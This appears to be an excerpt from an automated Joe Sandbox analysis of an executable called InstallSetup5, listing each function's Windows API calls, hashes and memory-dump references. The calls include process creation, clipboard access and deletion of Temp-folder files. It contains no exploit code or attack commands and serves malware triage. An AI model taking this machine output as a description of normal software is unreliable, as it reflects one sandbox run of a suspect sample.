                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                              • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                                                                                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                              • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                              • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                                                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                              • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                              • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                                                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                              • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                                                                                                • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                                                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                                              • Opcode ID: 08e24528c5172c1f0df5ca4e9d907125f3b856060fead45283370b433cbda764
                                                                                                                                                              • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                                                                                              • Opcode Fuzzy Hash: 08e24528c5172c1f0df5ca4e9d907125f3b856060fead45283370b433cbda764
                                                                                                                                                              • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                                              • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID: {
                                                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                                                              • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                              • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                                                                                              • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                              • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                                              • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                                              • lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                                                • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                                                                                                • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                • Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                                                • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 2624150263-3554254475
                                                                                                                                                              • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                              • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                                              • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                              • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                                                                                                                                              • lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                                                                                                                                              • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                                                                                              • API String ID: 2035342205-941012923
                                                                                                                                                              • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                                              • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                                                                                              • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                                              • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 0040226E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                              • API String ID: 542301482-1104044542
                                                                                                                                                              • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                                                                                                                              • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                                                                                              • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                                                                                                                              • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
